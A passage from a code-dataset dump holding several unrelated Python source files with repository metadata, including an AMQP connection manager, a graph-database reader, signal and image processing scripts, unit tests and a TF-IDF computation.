self._actions.put((action, future))\n\n if future is not None:\n return future.result(timeout=timeout)\n\n return None\n\n def _queue_message_threaded(self, message):\n self.messages.put(message)\n\n def _on_consumer_receive(self, message):\n self._logger.log(5, \"Received message with tag %d from consumer\", message.delivery_tag)\n self._event_callback(message)\n\n def _on_message_ack(self, delivery_tag, multiple):\n messages = self._collect_messages(delivery_tag, multiple)\n if len(messages) > 0:\n confirm = DeliveryConfirmation(messages, False)\n self._logger.log(5, \"Received ack for %d, multiple=%s (%d messages)\", delivery_tag,\n multiple, len(messages))\n\n self._event_callback(confirm)\n\n def _on_message_nack(self, delivery_tag, multiple):\n messages = self._collect_messages(delivery_tag, multiple)\n if len(messages) > 0:\n confirm = DeliveryConfirmation(messages, True)\n\n self._logger.warning(\"Received NACK for %d, multiple=%s\", delivery_tag, multiple)\n self._event_callback(confirm)\n\n def _collect_messages(self, last_tag, multiple):\n messages = []\n if multiple:\n first_tag = next(iter(self._unconfirmed_publish))\n\n for tag in range(first_tag, last_tag + 1):\n context = self._unconfirmed_publish.pop(tag, None)\n if context is None:\n continue # See #677\n\n if context is not self._IGNORE_CONFIRM:\n messages.append(context)\n else:\n self._logger.log(5, \"delivery tag confirmation %d was ignored because with_confirm=False\", tag)\n else:\n context = self._unconfirmed_publish.pop(last_tag)\n if context is not self._IGNORE_CONFIRM:\n messages.append(context)\n else:\n self._logger.log(5, \"delivery tag confirmation %d was ignored because with_confirm=False\", last_tag)\n\n return messages\n\n def _manage_connection_threaded(self, 
connected_future):\n \"\"\"Background thread routine that manages the amqp connection.\"\"\"\n\n try:\n host_string = \"%s:%s\" % (self._host, self._port)\n\n self._logger.debug(\"Beginning connection to server %s\", host_string)\n\n conn = amqp.Connection(host_string, self._username, self._password,\n login_method='PLAIN', heartbeat=self._heartbeat,\n connect_timeout=self.CONNECT_TIMEOUT)\n\n conn.connect()\n except Exception as err: #pylint:disable=broad-except;This is a background thread and we're logging.\n self._logger.error(\"Could not open connection to %s\", host_string, exc_info=True)\n connected_future.set_exception(err)\n return\n\n self._logger.info(\"Successfully connected to host %s with prefetch=%s\", host_string, self._max_messages)\n connected_future.set_result(None)\n\n connection_open = True\n try:\n last_heartbeat = time.monotonic()\n\n channel = conn.channel()\n channel.basic_qos(0, self._max_messages, True) # True means that this applies to all consumers.\n\n channel.confirm_select() # Make sure we get publish confirmations\n channel.events['basic_ack'].add(self._on_message_ack)\n channel.events['basic_nack'].add(self._on_message_nack)\n\n while True:\n try:\n conn.drain_events(self.POLL_TIMEOUT)\n except socket.timeout:\n # pyamqp does not catch or block socket timeouts, which are expected when\n # there is no traffic on the connection.\n pass\n except (socket.error, amqp.exceptions.ConnectionForced) as err:\n self._logger.error(\"Connection closed from remote side: %s\", str(err))\n connection_open = False\n break\n\n now = time.monotonic()\n\n if (now - last_heartbeat) > 1.0:\n conn.heartbeat_tick()\n last_heartbeat = now\n\n if self._process_actions_threaded(channel):\n connection_open = False\n self._logger.debug(\"Stop received, shutting down connection\")\n break\n except Exception as err: #pylint:disable=broad-except;This is a background thread and we're logging.\n self._logger.error(\"Error managing connection, stopping\", exc_info=True)\n finally:\n try:\n if connection_open:\n conn.close()\n except: #pylint:disable=bare-except;We're in a different exception handler and logging.\n self._logger.warning(\"Error closing connection after another error\", exc_info=True)\n\n # Always tell whoever is listening to messages that we have closed the connection\n self._event_callback(None)\n\n def _process_actions_threaded(self, channel: amqp.Channel) -> bool:\n \"\"\"Process any pending actions in the background thread.\n\n Note:\n To avoid a situation where we consume new actions slower than they are\n being added and never finish this method, it captures the number of\n actions at start so that it only processes a fixed maximum number per call\n before returning.\n\n TODO:\n 1. 
Implement ack coalescing so that if we have a run of multiple\n _AcknowledgeMessage actions that are in order with no gaps, we send\n a single multiple_ack for all of them.\n\n Returns:\n Whether the connection is finished and we should stop the background thread.\n \"\"\"\n\n to_process = self._actions.qsize()\n i = 0\n\n # Group actions together so that we are able to coalesce acknowledgements\n actions = []\n while i < to_process:\n try:\n action_obj = self._actions.get_nowait()\n except Empty:\n break\n\n actions.append(action_obj)\n\n i += 1\n\n for action_obj in actions:\n if action_obj is None:\n return True\n\n action, future = action_obj\n result = None\n\n try:\n self._logger.log(5, \"Starting action %s\", action)\n\n if isinstance(action, _StartConsuming):\n result = self._start_consuming_threaded(channel, action)\n elif isinstance(action, _BindQueue):\n self._bind_queue_threaded(channel, action)\n elif isinstance(action, _AcknowledgeMessage):\n self._acknowledge_message_threaded(channel, action)\n elif isinstance(action, _PublishMessage):\n self._publish_message_threaded(channel, action)\n else:\n raise ValueError(\"Unknown action: %r\" % action)\n\n if future is not None:\n future.set_result(result)\n except (amqp.IrrecoverableConnectionError, amqp.IrrecoverableChannelError, ConnectionError) as err:\n if future is not None:\n future.set_exception(err)\n\n self._logger.error(\"Stopping connection because of irrecoverable error\", exc_info=True)\n return True\n except (amqp.exceptions.ConnectionForced, socket.error) as err:\n if future is not None:\n future.set_exception(err)\n\n self._logger.error(\"Connection closed from remote side: %s\", str(err))\n return True\n except Exception as err: #pylint:disable=broad-except;We need to return this exception to the caller in a future\n if future is not None:\n future.set_exception(err)\n else:\n self._logger.error(\"Error taking action %r\", action, exc_info=True)\n\n return False\n\n def _start_consuming_threaded(self, channel: amqp.Channel, action: _StartConsuming) -> str:\n tag = action.tag\n if tag is None:\n tag = ''\n\n tag = channel.basic_consume(action.queue, tag, callback=self._on_consumer_receive)\n self._logger.info(\"Started consumer (tag=%s) on queue %s\", tag, action.queue)\n\n return tag\n\n def _publish_message_threaded(self, channel: amqp.Channel, action: _PublishMessage):\n delivery_tag = self._next_message_tag\n self._next_message_tag += 1\n\n channel.basic_publish(action.message, exchange=action.exchange, routing_key=action.routing_key,\n immediate=False, mandatory=False)\n self._logger.log(5, \"Published message to %s:%s delivery_tag=%s\", action.exchange,\n action.routing_key, delivery_tag)\n\n if action.with_confirm:\n self._unconfirmed_publish[delivery_tag] = action.context\n else:\n self._unconfirmed_publish[delivery_tag] = self._IGNORE_CONFIRM\n\n def _bind_queue_threaded(self, channel: amqp.Channel, action: _BindQueue) -> None:\n channel.queue_declare(action.queue, exclusive=True)\n\n if action.binding_key is None:\n bindings = []\n elif isinstance(action.binding_key, str):\n bindings = [action.binding_key]\n else:\n bindings = action.binding_key\n\n for binding in bindings:\n channel.queue_bind(action.queue, action.exchange, binding)\n self._logger.info(\"Bound transient queue %s to exchange %s with key %s\",\n action.queue, action.exchange, binding)\n\n def _acknowledge_message_threaded(self, channel: amqp.Channel, action: _AcknowledgeMessage) -> None:\n channel.basic_ack(action.delivery_tag, 
action.multiple)\n self._logger.log(5, \"Acknowledged message with tag %d, multiple=%s\", action.delivery_tag, action.multiple)\n","repo_name":"IPCConnectedFactoryExchange/CFXRecorder","sub_path":"cfx_recorder/amqp/background_connection.py","file_name":"background_connection.py","file_ext":"py","file_size_in_byte":27294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"11754470036","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_signal(signal, sampling_rate=64):\n \n # initialize parameters\n time = np.arange(0, len(signal)/sampling_rate, 1/sampling_rate)\n points = len(time)\n hz = np.linspace(0, sampling_rate/2, int(np.floor(points/2)+1))\n \n\n ax1= plt.subplot(211)\n ax1.plot(time, signal, 'b')\n ax1.set_title('Normally distributed: Time domain')\n ax1.set_xlabel('Time')\n ax1.set_ylabel('Amplitude')\n\n ax2 = plt.subplot(223)\n y, x = np.histogram(signal, bins=100)\n ax2.plot(x[1:], y, 'k')\n ax2.set_title('Signal histogram (distribution)')\n ax2.set_xlabel('Values')\n ax2.set_ylabel('N per bin')\n\n ax3 = plt.subplot(224)\n amp = np.abs(np.fft.fft(signal)/points)\n amp[1:] = 2*amp[1:] # double the non-DC bins for the single-sided spectrum\n ax3.plot(hz, amp[:len(hz)], 'r')\n ax3.set_title('Frequency domain')\n ax3.set_xlabel('Frequency (Hz)')\n ax3.set_ylabel('Amplitude')\n\n plt.show()","repo_name":"krittaphascha/eeg_tutorial","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"69914679827","text":"from asyncio.exceptions import CancelledError\nfrom argo_dataflow_sdk import ProcessHandler\nimport asyncio\n\n\nasync def generator_handler():\n try:\n i = 0\n while True:\n print('running generator fn', i)\n yield f'Some Value {i}'.encode('UTF-8')\n i = i + 1\n await asyncio.sleep(1)\n except CancelledError:\n print('Generator function got cancelled, time to cleanup.')\n\nif __name__ == '__main__':\n processHandler = ProcessHandler()\n processHandler.start_generator(generator_handler)\n","repo_name":"argoproj-labs/old-argo-dataflow","sub_path":"sdks/python/tests/fixtures/generator_step_async_handler/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"48"}
{"seq_id":"20941387620","text":"\"\"\"\nProject Euler (http://projecteuler.net/)\nProblem 22\n\"\"\"\n\nfrom contextlib import closing\nfrom urllib.request import urlopen\n\nURL = 'http://projecteuler.net/project/names.txt'\nwith closing(urlopen(URL)) as f:\n\tCONTENT = f.read().decode()\n\ndef solution():\n\tnames = sorted(x.strip('\"') for x in CONTENT.split(','))\n\twordval = lambda w: sum(ord(c)-64 for c in w)\n\n\treturn sum(i * wordval(n) for i,n in enumerate(names, 1))\n\nif __name__ == \"__main__\":\n print(solution())","repo_name":"tnaumann/ProjectEuler","sub_path":"problem022.py","file_name":"problem022.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"10997614320","text":"# pylint: disable=redefined-outer-name\n\"\"\"\nTest the numpy and scipy.sparse backend.\n\"\"\"\nimport pytest\nimport numpy as np\nimport numpy.testing as npt\nimport scipy as sp\n\nfrom .. 
import backend as bknd\n\n\n@pytest.fixture\ndef matrix():\n \"A sample matrix\"\n return np.array([[0, 3, 5],\n [2, 5, 0],\n [2, 0, 8]])\n\n\ndef test_inv_numpy(matrix):\n \"Calculate the inverse of a numpy array.\"\n size = matrix.shape[0]\n inv = bknd.inv(matrix)\n npt.assert_allclose(matrix.dot(inv), np.identity(size), atol=1e-10)\n\n\ndef test_inv_sparse(matrix):\n \"Calculate the inverse of a sparse matrix.\"\n size = matrix.shape[0]\n spmatrix = sp.sparse.csc_matrix(matrix)\n inv = bknd.inv(spmatrix)\n npt.assert_allclose(spmatrix.dot(inv).todense(), np.identity(size),\n atol=1e-10)\n\n\ndef test_solve_numpy(matrix):\n \"Solve a linear system with a numpy array matrix\"\n true_solution = np.array([5, 6, 7])\n rh_side = matrix.dot(true_solution)\n solution = bknd.solve(matrix, rh_side)\n npt.assert_allclose(matrix.dot(solution), rh_side)\n npt.assert_allclose(true_solution, solution)\n\n\ndef test_solve_sparse(matrix):\n \"Solve a linear system with a sparse matrix\"\n spmatrix = sp.sparse.csc_matrix(matrix)\n true_solution = np.array([5, 6, 7])\n rh_side = spmatrix.dot(true_solution)\n solution = bknd.solve(spmatrix, rh_side)\n npt.assert_allclose(spmatrix.dot(solution), rh_side)\n npt.assert_allclose(true_solution, solution)\n\n\ndef test_multiply(matrix):\n \"Element-wise multiplication using numpy arrays and scipy.sparse matrices\"\n true_solution = np.array([[0, 6, 15],\n [-2, 10, 0],\n [-2, 0, 24]])\n vector = np.array([-1, 2, 3])\n\n solution = bknd.multiply(matrix, vector)\n npt.assert_allclose(solution, true_solution)\n\n spmatrix = sp.sparse.csc_matrix(matrix)\n # Left multiply\n sp_solution = bknd.multiply(spmatrix, vector)\n npt.assert_allclose(sp_solution.todense(), true_solution)\n # Right multiply\n rsp_solution = bknd.multiply(vector, spmatrix)\n npt.assert_allclose(rsp_solution.todense(), true_solution)\n","repo_name":"opengeophysics/deeplook","sub_path":"deeplook/tests/test_backend.py","file_name":"test_backend.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"1005291760","text":"\"\"\" Module: reader\n\nProvide an API for retrieving data from a graph database, including\nget and multiget actions on nodes, edges, and paths.\n\nProvides:\n def get_node\n def get_nodes_by_index\n def multiget_node\n def get_edge\n def multiget_edge\n def get_path_to_neighbor_nodes\n def multiget_path_to_neighbor_nodes\n\n\"\"\"\nfrom model.constants import NODE_PROPERTY, EDGE_PROPERTY\nfrom model.data import database_manager\nfrom model.data.data_errors import DbInputError, DbReadError\n\nfrom constants import GRAPH_PROPERTY\nfrom model.graph import GraphEdge, GraphNode, GraphPath, GraphOutputError\n\n\ndef database():\n \"\"\" Get a database from the data layer's database_manager. 
\"\"\"\n return database_manager.database()\n\n\ndef get_node(node_id):\n \"\"\" Return a GraphNode from a graph database.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphNode:\n\n {\n \"id\" : node_id,\n \"type\" : type,\n \"properties\" : {\"p0\" : p0, ..., \"pN\" : pN},\n \"edges\" : {edge_id0 : edge_dict0, ..., edge_idN : edge_dictN}\n }\n\n Required:\n id node_id id of node to fetch\n\n Returns:\n GraphNode single GraphNode instance\n\n Raises:\n GraphOutputError bad input\n\n \"\"\"\n # cases:\n # 1/ success: dict returned;\n # 2/ id was bad: error raised, execution halted;\n # 3/ db fails: error caught, None assigned here.\n\n graph_node = None\n\n try:\n node_dict = database().read_node_and_edges(node_id)\n\n if node_dict:\n graph_node = _process_node(node_dict)\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return graph_node\n\n\ndef get_nodes_by_index(key, value, node_type_return_filter=None):\n \"\"\" Return a dict of GraphNodes from a graph database index.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphNode:\n\n {\n \"id\" : node_id,\n \"type\" : type,\n \"properties\" : {\"p0\" : p0, ..., \"pN\" : pN},\n \"edges\" : {edge_id0 : edge_dict0, ..., edge_idN : edge_dictN}\n }\n\n Required:\n str key indexed property key to look up\n mixed value indexed property value to look up\n\n Optional:\n list node_type_return_filter node types to filter for\n\n Returns:\n dict GraphNodes keyed on ID\n\n Raises:\n GraphOutputError bad input\n\n \"\"\"\n\n # cases:\n # 1/ success: dict returned;\n # 2/ k/v pair was bad: error raised, execution halted;\n # 3/ db fails: error caught, None assigned here.\n\n graph_nodes = None\n try:\n node_dicts = database().read_nodes_by_index(\n key,\n value,\n node_type_return_filter)\n if node_dicts is None:\n node_dicts = {}\n\n graph_nodes = {}\n for id, node_dict in node_dicts.items():\n graph_nodes[id] = _process_node(node_dict)\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return graph_nodes\n\n\ndef _process_node(node_dict):\n \"\"\" Convenience wrapper to validate and convert to a GraphNode. 
\"\"\"\n\n required_fields = set([\n NODE_PROPERTY.ID,\n NODE_PROPERTY.TYPE,\n NODE_PROPERTY.PROPERTIES,\n NODE_PROPERTY.EDGES,\n ])\n\n required_properties = set([\n GRAPH_PROPERTY.CREATED_TS,\n GRAPH_PROPERTY.UPDATED_TS,\n GRAPH_PROPERTY.DELETED_TS,\n ])\n\n # data layer nodes only have fields explicitly required\n errors = required_fields.symmetric_difference(set(node_dict))\n\n if NODE_PROPERTY.PROPERTIES not in errors:\n # ensure properties the graph layer requires are present too\n properties = set(node_dict[NODE_PROPERTY.PROPERTIES])\n property_errors = required_properties.difference(properties)\n errors = errors.union(property_errors)\n\n if errors:\n raise GraphOutputError(\n errors,\n \"Required fields or properties missing from GraphNode.\")\n\n return GraphNode(\n node_dict[NODE_PROPERTY.ID],\n node_dict[NODE_PROPERTY.TYPE],\n node_dict[NODE_PROPERTY.PROPERTIES],\n node_dict[NODE_PROPERTY.EDGES])\n\n\ndef multiget_node(node_ids):\n \"\"\" Return a dict of GraphNodes from a database keyed on id.\n\n Wrap a set of calls to a graph database that each return a dict\n structured like the one referenced in get_node(), and parse them\n into GraphNodes.\n\n Required:\n list node_ids list of ids of node to fetch\n\n Returns:\n dict GraphNodes keyed on node id\n\n \"\"\"\n\n nodes = {}\n\n for node_id in node_ids:\n nodes[node_id] = get_node(node_id)\n\n return nodes\n\n\ndef get_edge(edge_id):\n \"\"\" Return a GraphEdge from a graph database.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphEdge:\n\n {\n \"id\" : edge_id,\n \"type\" : type,\n \"properties\" : {\"p0\" : p0, ..., \"pN\" : pN},\n \"from_node_id\" : from_node_id,\n \"to_node_id\" : to_node_id\n }\n\n Required:\n id edge_id id of edge to fetch\n\n Returns:\n GraphEdge single GraphEdge instance\n\n \"\"\"\n\n # cases:\n # 1/ success: dict returned;\n # 2/ id was bad: error raised, execution halted;\n # 3/ db fails: error caught, None assigned here.\n\n edge = None\n\n required_fields = set([\n EDGE_PROPERTY.ID,\n EDGE_PROPERTY.TYPE,\n EDGE_PROPERTY.PROPERTIES,\n EDGE_PROPERTY.FROM_NODE_ID,\n EDGE_PROPERTY.TO_NODE_ID\n ])\n\n required_properties = set([\n GRAPH_PROPERTY.CREATED_TS,\n GRAPH_PROPERTY.UPDATED_TS,\n GRAPH_PROPERTY.DELETED_TS\n #GRAPH_PROPERTY.IS_ONE_WAY,\n #GRAPH_PROPERTY.IS_UNIQUE\n ])\n\n try:\n edge_dict = database().read_edge(edge_id)\n\n if edge_dict:\n # data layer edges only have fields explicitly required\n errors = required_fields.symmetric_difference(set(edge_dict))\n\n if EDGE_PROPERTY.PROPERTIES not in errors:\n # ensure properties the graph layer requires are present too\n properties = set(edge_dict[EDGE_PROPERTY.PROPERTIES])\n property_errors = required_properties.difference(properties)\n errors = errors.union(property_errors)\n\n if errors:\n raise GraphOutputError(\n errors,\n \"Required fields/properties missing from GraphEdge.\")\n\n edge = GraphEdge(\n edge_dict[EDGE_PROPERTY.ID],\n edge_dict[EDGE_PROPERTY.TYPE],\n edge_dict[EDGE_PROPERTY.PROPERTIES],\n edge_dict[EDGE_PROPERTY.FROM_NODE_ID],\n edge_dict[EDGE_PROPERTY.TO_NODE_ID])\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return edge\n\n\ndef multiget_edge(edge_ids):\n \"\"\" Return a dict of GraphEdges from a database keyed on id.\n\n Wrap a set of calls to a graph database that each return a dict\n structured like the one referenced in get_edge(), and parse them\n into 
GraphEdges.\n\n Required:\n list edge_ids list of ids of edge to fetch\n\n Returns:\n dict GraphEdges keyed on edge id\n\n \"\"\"\n\n edges = {}\n\n for edge_id in edge_ids:\n edges[edge_id] = get_edge(edge_id)\n\n return edges\n\n\n#def get_edges_for_node(node_id): pass\n#def multiget_edges_for_node(node_ids): pass\n\n\ndef get_path_to_neighbor_nodes(\n start_node_id,\n edge_type_pruner=None,\n node_type_return_filter=None):\n \"\"\" Traverse a depth-1 path from a start node to its neighbors.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphPath:\n\n {\n depth0 : {start_node_id : {start_node_dict}},\n depth1 : {node_id0 : {node_dict0}, ..., node_idN : {node_dictN}}\n }\n\n Required:\n id start_node_id start node id in a depth-1 path\n\n Optional:\n list edge_type_pruner list of edge types to traverse\n list node_type_return_filter list of node types to return\n\n Returns:\n GraphPath single GraphPath instance\n\n \"\"\"\n\n path = None\n\n try:\n # issue a db query to generate a path to neighbors\n path_dict = database().read_nodes_from_immediate_path(\n start_node_id,\n edge_type_pruner,\n node_type_return_filter)\n\n # FIXME: do similar checking to get_node() for path_dict[0]\n\n # instantiate all nodes and edges in one fell swoop\n path = GraphPath(start_node_id, path_dict)\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return path\n\n\ndef multiget_path_to_neighbor_nodes(\n start_node_ids,\n edge_type_pruner=None,\n node_type_return_filter=None):\n \"\"\" Traverse depth-1 paths from start nodes to their neighbors.\n\n Wrap a set of calls to a graph database that each return a dict\n structured like the one referenced in get_path_to_neighbor_nodes(),\n and parse them into GraphPaths.\n\n Required:\n list start_node_id start node id in a depth-1 path\n\n Optional:\n list edge_type_pruner list of edge types to traverse\n list node_type_return_filter list of node types to return\n\n Returns:\n dict GraphPaths keyed on start node id\n\n \"\"\"\n\n paths = {}\n\n for start_node_id in start_node_ids:\n paths[start_node_id] = get_path_to_neighbor_nodes(\n start_node_id,\n edge_type_pruner,\n node_type_return_filter)\n\n return paths\n","repo_name":"scrbrd/scoreboard","sub_path":"model/graph/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":10372,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"70214042707","text":"import cv2\nimport numpy as np\nimport glob\nfrom sklearn.cluster import KMeans\nimport cv2\n# import os\n## getting the mask from the rgb images\ndef preprocessing(img, i):\n # resizing using aspect ratio intact and finding the circle\n # reduce size retain aspect ratio intact\n # invert BGR 2 RGB\n RGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) \n cv2.imwrite(\"/home/akash/Documents/Projects/unet/data/membrane/train1/image/%d.png\"%i, RGB)\n cv2.imwrite(\"/home/akash/Documents/Projects/unet/data/membrane/test1/%d.png\"%i, RGB)\n Ig = RGB[:, :, 2]\n # convert in to float and get log trasform for contrast streching\n g = 0.2 * (np.log(1 + np.float32(Ig)))\n normalized_image = cv2.normalize(g, None, 0, 255, cv2.NORM_MINMAX, dtype = cv2.CV_8U)\n # change into uint8\n cvuint = cv2.convertScaleAbs(normalized_image)\n # cvuint8.dtype\n ret, th = cv2.threshold(cvuint, 0, 255, cv2.THRESH_OTSU)\n ret1,th1 = cv2.threshold(Ig,0,255,cv2.THRESH_OTSU)\n 
# closeing operation\n # from skimage.morphology import disk\n # from skimage.morphology import erosion, dilation, opening, closing, white_tophat\n # selem = disk(30)\n # cls = opening(th, selem)\n # plot_comparison(orig_phantom, eroded, 'erosion')\n # in case using opencv\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (35,35))\n cls = cv2.morphologyEx(th, cv2.MORPH_OPEN, kernel)\n #Im = cls*rz # the mask with resize image\n # cv2.imwrite('mynew.jpg', mask)\n return (th,th1,cls,normalized_image,RGB)\nimport argparse\nimport sys\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help = \"Path to the image\") \nap.add_argument(\"-n\", \"--num\", required = True, help = \"num\")\nargs = vars(ap.parse_args())\n\npath_dir = (args[\"image\"])\nprint(path_dir)\ni = (int)(args[\"num\"])\nprint('running code....')\nimg = cv2.imread(path_dir)\n(th,th1,cls,g,RGB) = preprocessing(img, i)\nfrom matplotlib import pyplot as plt\n # plt.imshow(cls)\n # plt.show()\n # cv2.imshow('asd',cls)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n # plot the data\ntitles = ['Original Image', 'log_transform','mask using logT','mask without log_T ']\nimages = [RGB,g,cls,th]\ncv2.imwrite('/home/akash/Documents/Projects/unet/data/membrane/train1/label/%d.png'%i, g)\nfor i in range(0,len(images)):\n print(i)\n plt.subplot(2, 3, i + 1)\n plt.imshow((images[i]),'gray')\n plt.title(titles[i]) \n plt.xticks([]), plt.yticks([])\n\n\nplt.show()\n","repo_name":"akashsmaran/DatasetBuilder","sub_path":"test/kmeans2.py","file_name":"kmeans2.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1495070823","text":"class Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n dic={}\n j=0\n for i in order:\n dic[i]=j\n j+=1\n for i in range(len(words)-1):\n w1,w2=words[i],words[i+1]\n for j in range(len(w1)):\n if j==len(w2):\n return False\n if w1[j] != w2[j]:\n if dic[w2[j]] < dic[w1[j]]:\n return False\n break\n return True\n ","repo_name":"AsmaKacem1/Leetcode","sub_path":"0953-verifying-an-alien-dictionary/0953-verifying-an-alien-dictionary.py","file_name":"0953-verifying-an-alien-dictionary.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17711168376","text":"import pytest\n\nimport numpy as np\n\nfrom cysounddevice import types\nfrom _test_conversion import BufferWrapper, build_buffer\n\ndef build_signal(fs, length, nchannels, fc=1000):\n t = np.arange(length) / fs\n a = np.sin(2*np.pi*fc*t)\n result = np.zeros((nchannels, length), dtype=a.dtype)\n roll_factor = int(length / nchannels // 2)\n for i in range(nchannels):\n result[i,:] = np.roll(a, i * roll_factor)\n return np.asarray(result, dtype='float32')\n\ndef test_converters(sample_rate, block_size, sample_format):\n NCHANNELS_LIST = [1,2,4,8]\n FC_LIST = [500, 1000, 10000]\n NBLOCKS = 8\n\n sig_array = np.zeros((max(NCHANNELS_LIST), len(FC_LIST), NBLOCKS, block_size), dtype=np.float32)\n\n for i, fc in enumerate(FC_LIST):\n for j in range(NBLOCKS):\n sig = build_signal(sample_rate, block_size, max(NCHANNELS_LIST), fc)\n sig_array[:,i,j,:] = sig\n\n nse = np.random.uniform(-.5, .5, sig_array.shape)\n sig_array *= nse\n sig_array *= .9\n\n ptp = 2 ** sample_format['bit_width']\n tolerance = 1. 
/ (ptp / 2)\n\n for i, nchannels in enumerate(NCHANNELS_LIST):\n\n print(f'sample_format={sample_format}, nchannels={nchannels}')\n\n bfr = build_buffer(sample_rate, block_size, nchannels, sample_format['name'])\n\n for j, fc in enumerate(FC_LIST):\n\n sig = sig_array[:nchannels,j]\n sig_orig = np.array(sig.tolist(), dtype='float32')\n\n packed = bfr.pack_and_unpack_items(sig)\n\n if sample_format['name'] == 'float32':\n assert np.array_equal(sig_orig, packed)\n else:\n assert np.abs(sig_orig - packed).max() <= tolerance\n","repo_name":"nocarryr/cython-sounddevice","sub_path":"tests/test_conversion.py","file_name":"test_conversion.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"14251758290","text":"import time\nimport re\nimport string\nfrom collections import Counter\nimport math\n\nfrom nltk import WordNetLemmatizer\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom tqdm.auto import tqdm\n\n\ndef clean_docs(docs):\n final = []\n for doc in tqdm(docs):\n doc = doc.lower()\n clean_doc = doc.replace(\"redbull\", \"\")\n clean_doc = clean_doc.replace(\"red\", \"\")\n clean_doc = clean_doc.replace(\"bull\", \"\")\n\n final.append(clean_doc)\n return final\n\n\ndef calc_df_idfV2(documents, fichier_idf):\n filter_docs = []\n text_tokens_lemmatize = []\n\n new_stopwords = [\".\", \"n't\", \"?\", \"!\", \"...\", \",\", \";\", \":\", \")\", \"(\", \"&\", \"|\", \"..\"]\n stopwordsCustom = stopwords.words('english')\n for new_stop in new_stopwords:\n stopwordsCustom.append(new_stop)\n time.sleep(0.5)\n\n print(\"\\nClean Doc\")\n documents = clean_docs(documents)\n time.sleep(0.5)\n\n lemmatizer = WordNetLemmatizer()\n print(\"\\nTokenize\")\n for doc in tqdm(documents):\n text_tokens = word_tokenize(doc.lower())\n for words_before_lemmatize in text_tokens:\n if \"@\" or \"#\" not in words_before_lemmatize :\n text_tokens_lemmatize.append(lemmatizer.lemmatize(words_before_lemmatize, pos=\"v\"))\n filter_docs.append([word for word in text_tokens_lemmatize if not word in stopwordsCustom])\n time.sleep(0.5)\n\n words_set = set()\n for doc in filter_docs:\n words_set = words_set.union(doc)\n print('Nombre de mots total : ', len(words_set))\n time.sleep(0.5)\n\n n_docs = len(filter_docs) # ·Number of documents in the corpus\n print(f\"Nombre de document : {n_docs}\")\n time.sleep(0.5)\n\n # df_tf = pd.DataFrame(np.zeros((n_docs, n_words_set)), columns=words_set)\n\n #print(\"\\nCalcul DF :\")\n #for i in tqdm(range(n_docs)):\n # words = filter_docs[i] # Words in the document\n # for w in words:\n # df_tf[w][i] = df_tf[w][i] + (1 / len(words))\n #time.sleep(0.5)\n\n print(\"\\nCalcul IDF :\")\n idf = {}\n for w in tqdm(words_set):\n k = 0 # number of documents in the corpus that contain this word\n for i in range(n_docs):\n if w in filter_docs[i]:\n k += 1\n idf[w] = np.log10(n_docs / k)\n time.sleep(0.5)\n idf = dict(sorted(idf.items(), key=lambda item: item[1]))\n print(f\"\\nIDF inverse :\\n{idf}\")\n\n\n print(\"\\nÉcriture dans CSV\")\n fichier = open(fichier_idf, \"w\")\n fichier.write(\"mot;idf_inverse\\n\")\n for cle, valeur in tqdm(idf.items()):\n fichier.write(str(cle + \";\" + str(\"{:.12f}\".format(valeur)) + \"\\n\"))\n\n return 
